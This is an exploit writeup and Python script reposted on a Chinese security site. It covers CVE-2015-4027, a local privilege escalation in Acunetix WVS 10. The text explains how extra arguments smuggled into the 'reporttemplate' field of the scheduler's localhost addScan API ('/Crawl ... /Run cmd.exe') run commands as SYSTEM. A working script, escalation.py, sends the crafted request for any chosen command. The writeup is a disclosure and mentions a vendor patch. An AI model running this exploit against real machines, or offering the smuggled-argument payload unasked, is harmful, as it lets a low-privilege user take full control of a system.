首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Acunetix WVS 10 - Local Privilege escalation
来源:danielelinguaglossa at gmail.com 作者:Daniele 发布时间:2015-12-03  
'''
========================================================================
Acunetix WVS 10 - from guest to Sytem (Local privilege escalation)
 
CVE: CVE-2015-4027
Author: (me) Daniele Linguaglossa
Affected Product: Acunetix WVS 10
Exploit: Local privilege escalation
Vendor: Acunetix ltd
Remote: No
Version: 10
=========================================================================
A local privilege escalation exists in Acunetix  WVS 10, it allow
a local user (even guest) to gain same privilege as System user.
 
With default Acunetix installation, a service called "AcuWVSSchedulerv10"
will be installed, this service run as local system user.
 
AcuWVSSchedulerv10 is reponsable for scan scheduling without user interaction
it expose some API to interact via a web server usually localhost:8183.
 
API:
 
/listScan
/addScan <== vulnerable one
/deleteScan
etc...
 
When a user schedule a scan API "addScan" will be called as following
 
-------------------------------------------------------------------------------
POST /api/addScan HTTP/1.1
Host: localhost:8183
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
RequestValidated: true
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8183/
Content-Length: 452
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
 
{
    "scanType": "scan",
    "targetList": "",
    "target": ["http://.target.it"],
    "recurse": "-1",
    "date": "12/2/2015",
    "dayOfWeek": "1",
    "dayOfMonth": "1",
    "time": "12:21",
    "deleteAfterCompletion": "False",
    "params": {
        "profile": "Default",
        "loginSeq": "<none>",
        "settings": "Default",
        "scanningmode": "heuristic",
        "excludedhours": "<none>",
        "savetodatabase": "True",
        "savelogs": "False",
        "generatereport": "False",
        "reportformat": "PDF",
        "reporttemplate": "WVSAffectedItemsReport.rep",
        "emailaddress": ""
    }
}
------------------------------------------------------------------------------
 
The first thing i noticed was the reporttemplate, this was used to create report
when scanning ends, so it means an external file wich we can control will be then
used by System! this would be interesting enough but i never look deep into.
Instead i noticed something even worst, filename was used as argument to wvs.exe
called with system privilege!
 
By looking at how Acunetix handled reporttemplate argument i figured out that was
possibile to inject custom arguments within reporttemplate, now this is where
Acunetix help us :D in fact wvs was provided with an interesting argument it was
/Run as reference says:
 
https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/
 
Run a command line command during the crawl.
Syntax: /Run [command]
 
Example: /Run curl http://example.com/dir1/
 
Wow that's really nice, so in order to execute a command we must insert a fake
Crawl followed by a Run command so reporttemplate become:
 
"reporttemplate": "WVSAffectedItemsReport.rep /Craw http://fakesite.it /Run cmd.exe"
 
it worked cmd runned as System!
==================================================================================
 
Now let's pwn this!
 
escalation.py
'''
 
import httplib
import json
from datetime import datetime
import sys
from time import gmtime, strftime
 
 
COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe"
ACUHOST = '127.0.0.1'
ACUPORT = 8183
ACUHEADERS = {
    "Content-Type": "application/json; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "RequestValidated": "true"
    }
ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\""
ACUDATA = {"scanType":"scan",
           "targetList":"",
           "target":["http://"+"A"*2048],
           "recurse":"-1",
           "date":strftime("%m/%d/%Y", gmtime()),
           "dayOfWeek":"1",
           "dayOfMonth":"1",
           "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
           "deleteAfterCompletion":"False",
           "params":{"profile":"Default",
                     "loginSeq":"<none>",
                     "settings":"Default",
                     "scanningmode":"heuristic",
                     "excludedhours":"<none>",
                     "savetodatabase":"True",
                     "savelogs":"False",
                     "generatereport":"False",
                     "reportformat":"PDF",
                     "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
                     "emailaddress":""}
           }
 
def sendExploit():
    conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
    conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
    resp = conn.getresponse()
    return "%s %s" % (resp.status, resp.reason)
 
print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n"
print "[+] Command : %s will be executed as SYSTEM" % COMMAND
print "[+] Sending exploit..."
print "[+] Result: "+sendExploit()
print "[+] Done!"
 
'''
============================================================================
 
I hope this write-up was funny enough anyway i really would like to thank
Acunetix product manager N.S. for the really fast answer and bug mitigation,
right now a patch exists so hurry up download it now.
============================================================================
'''
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Centos 7.1/Fedora 22 - abrt Lo
·Oracle BeeHive 2 Arbitrary Fil
·RHEL 7.0/7.1 - abrt/sosreport
·Oracle BeeHive 2 Code Executio
·Advantech Switch Bash Environm
·Atlassian HipChat for Jira Plu
·Easy File Sharing Web Server 7
·OpenMRS 2.3 (1.11.4) XXE Injec
·BisonWare BisonFTP Server 3.5
·Mac OS X 10.11 FTS Buffer Over
·KNX ETS 4.1.5 Build 3246 Buffe
·phpFileManager 0.9.8 Remote Co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved